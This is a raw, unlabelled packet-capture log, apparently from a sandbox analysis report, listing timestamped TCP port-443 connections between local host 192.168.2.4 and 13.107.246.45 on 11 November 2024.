                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802886009 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802891970 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.803270102 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.803272963 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894303083 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894350052 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894565105 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894691944 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894706011 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894717932 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.894723892 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895183086 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895240068 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895283937 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895289898 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895795107 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.895853043 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.896153927 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.896172047 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.896183968 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.896188974 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.897056103 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.897059917 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.900811911 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.900849104 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.900930882 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.901444912 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.901472092 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.901529074 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902044058 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902053118 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902106047 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902189016 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902199984 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902287960 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902297974 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902369976 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.902379036 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428093910 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428603888 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428653002 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428723097 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428738117 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428939104 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.428957939 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429266930 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429275036 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429406881 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429410934 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429574013 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429582119 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429949045 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.429953098 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.461394072 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.462018013 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.462035894 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.462523937 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.462528944 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521044016 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521326065 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521397114 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521425962 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521425962 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521439075 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.521447897 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.523766994 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.523852110 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.523899078 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524159908 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524178028 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524188042 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524194002 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524460077 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524482012 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524539948 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524657011 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524708033 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524755001 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524836063 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.524847031 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.525089979 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.525094032 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.527844906 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.527874947 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.527941942 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528078079 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528105021 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528160095 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528270960 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528283119 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528296947 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.528311014 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.559887886 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560077906 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560132980 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560158968 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560158968 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560172081 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.560182095 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.563827991 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.563847065 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.563903093 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.564260006 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:00.564270973 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.046055079 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.046124935 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.046798944 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.046808958 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.047323942 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.047329903 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.047339916 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.047652960 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.047679901 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048058987 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048065901 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048301935 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048315048 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048669100 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.048672915 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.110224962 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.111473083 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.111494064 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.112366915 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.112371922 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.138978004 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139046907 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139120102 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139316082 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139328957 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139338970 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139343977 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139889956 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139962912 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.139965057 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140018940 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140130997 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140194893 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140364885 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140378952 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140388966 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.140402079 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.142273903 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.142285109 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.145428896 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.145446062 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.145664930 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.146713972 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.146749020 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.146819115 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.148937941 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.148952007 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.149570942 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.149584055 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.150409937 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.150434017 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.150509119 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.150624990 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.150635004 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.155354023 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.155838013 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.155853987 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.156284094 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.156289101 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203048944 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203298092 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203372955 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203510046 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203510046 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203524113 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.203532934 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.205404997 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.205424070 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.205621004 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.205805063 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.205812931 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248703957 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248764038 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248833895 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248970032 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248979092 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248989105 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.248995066 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.253573895 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.253616095 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.253680944 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.253802061 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.253815889 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.664774895 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.665091038 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.665471077 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.718400002 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.718403101 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.718404055 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.719561100 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.741386890 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.741393089 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.741909981 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.741914034 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742167950 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742177010 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742536068 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742542028 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742747068 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.742757082 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743091106 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743096113 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743474007 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743479967 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743822098 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.743825912 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.767308950 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.812241077 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.832634926 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.832643032 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.833148956 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.833153009 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.846961021 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847006083 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847034931 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847084045 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847194910 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847201109 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847280025 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847333908 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847368002 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847496986 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847534895 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.847572088 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.871665955 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.871681929 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.871691942 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.871697903 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.931457043 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.931515932 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:01.931704044 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.052910089 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.052951097 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.052949905 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.052958965 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.054117918 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.054156065 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.054169893 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.054176092 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.055011034 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.055042028 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.055058956 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.055064917 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.056432009 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.056441069 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.056456089 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.056459904 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.059226036 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.059267044 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.059339046 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.095875025 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.095896006 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.128303051 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.128343105 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.128412008 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.137734890 CET49802443192.168.2.413.107.246.45
